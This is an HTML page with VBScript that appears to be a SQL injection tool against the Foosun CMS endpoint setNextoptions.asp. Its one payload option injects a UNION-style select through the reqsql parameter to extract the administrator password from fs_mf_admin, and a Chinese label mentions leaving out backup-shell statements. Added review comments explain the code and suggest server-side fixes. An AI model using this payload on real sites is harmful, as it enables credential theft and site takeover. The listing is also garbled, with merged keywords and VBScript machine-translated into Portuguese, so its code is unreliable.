<ScriptLanguage = "vBScript">
' window_onload: load handler that sizes and positions the window.
' NOTE(review): this listing has lost whitespace and had keywords machine-
' translated, so it does not parse as VBScript as shown. The header and footer
' presumably read `Sub window_onload` / `End Sub` - confirm against an
' undamaged copy before relying on any line here.
Subwindow_onload
' Presumably a resizeTo call with the arguments 450 and 380 - TODO confirm.
Window.RESIZETO450.380
' Presumably a moveTo call with the arguments 300 and 300 - TODO confirm.
window.moveto300.300
Endsub
</Script>
<ScriptLanguage = "vBScript">
' gethttppage: fetches the address in `caminho`, decodes the reply as gb2312,
' shows it on the page and returns the decoded text.
'   caminho - full request URL. The only caller visible on this page is the
'             onchange handler of the `sql` select, which passes the `urlcode`
'             field concatenated with the chosen option value, so the whole
'             URL including its query string is operator-supplied.
' Defender note: the one option visible on the page puts SQL text into a
' request parameter named reqsql for setNextoptions.asp. The endpoint appears
' to accept SQL from the query string; the remedy is server-side (do not take
' SQL text from the request), and web-server logs can be searched for requests
' to that path whose query string contains SQL keywords.
Functiongethttppage (caminho)
' Raw response bytes; getBody suppresses its own errors, so `t` may be Empty.
t = getBody (caminho)
' The charset is fixed to gb2312 regardless of what the server declares.
gethttppage = bytestobstr (t, "gb2312")
' Assigned through InnerText, so the reply is shown as text rather than parsed
' as markup. NOTE(review): no element with id "URL" is visible in this part of
' the page - confirm it exists further down.
Document.getElementById ("URL"). InnerText = Gethttppage
' NOTE(review): machine-translated line; presumably `End Function`.
Função final
</script>
<ScriptLanguage = "vBScript">
' GetBody: issues one HTTP GET for URL and returns the raw response body.
'   URL - address to request; it is not validated or restricted here.
' Returns the ResponseBody of the request object. Every runtime error is
' suppressed (see below), so a failed request leaves the return value unset
' and the caller cannot tell a failure from an empty reply.
' NOTE(review): several tokens are translation-damaged (`.Popen`, `.Enviar`,
' `nada`, `Função final`); the comments below give the presumed originals.
FunctionGetBody (URL)
' Presumably `On Error Resume Next`: errors from the lines below are ignored.
OnErrorReSumenext
' Creates the XMLHTTP request object (ProgID as written on this line).
Setretrieval = CreateObject ("Microsoft.xmlHttp")
Withretrieval
' Presumably `.Open`: method "Get", third argument False (presumably the async
' flag, i.e. the call blocks), user name and password both empty strings.
.Popen "Get", URL, False, "", ""
' Presumably `.Send` - TODO confirm.
.Enviar
' No status code is checked before the body is taken.
GetBody = .ResponseBody
ENDWITH
' Presumably `Set retrieval = Nothing`, releasing the request object.
Setretrieval = nada
' NOTE(review): machine-translated line; presumably `End Function`.
Função final
' BytesToBstr (header damaged to `ByTestobstr`): converts a byte array to a
' string by writing it into an ADODB.Stream in binary mode and reading it
' back as text in the requested character set.
'   corpo - the bytes to decode. NOTE(review): the write line below says
'           `writebody`, presumably `Write body`; the parameter name was
'           translated on the signature only, so the two no longer agree.
'   cset  - charset name assigned to the stream before the text is read.
' Returns the decoded text from ReadText.
' There is no error handling here: if `corpo` is Empty (GetBody suppresses its
' errors) the write would presumably raise a runtime error.
FunctionByTestobstr (corpo, cset)
DIMOBJSTREAM
SetObjstream = CreateObject ("adodb.stream")
' Type 1 = adTypeBinary: the stream first accepts raw bytes.
objstream.type = 1
' Mode 3 = adModeReadWrite.
objstream.mode = 3
objstream.open
objstream.writebody
' Rewind so that the read starts at the first byte written.
objstream.Position = 0
' Type 2 = adTypeText: the same bytes are now interpreted as text.
objstream.type = 2
objstream.charset = cset
Bytestobstr = objStream.readText
objstream.close
' Presumably `Set objstream = Nothing`.
Setobjstream = nada
' NOTE(review): machine-translated line; presumably `End Function`.
Função final
</script>
<title> BYLCX </title>
<inputId = "urlcode" name = "urlcode" size = "60" value = "http: // 风讯 url/user/setNextoptions.asp">
<selectId = "sql" name = "sql" onchange = vbs: gethttppage (document.getElementById ("urlcode"). value+document.getElementById ("sql"). value)>
<pptionValue = ""> 风讯 SQL 版注入 , 至于其它备份 Shell 的语句懒得写了 </pption>
<optionValue = "? Equvalue = 1 & reqsql = selecione%201, admin_pass_word, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,50,51%20from%20fs_mf_admin%20where%20iD = 1-")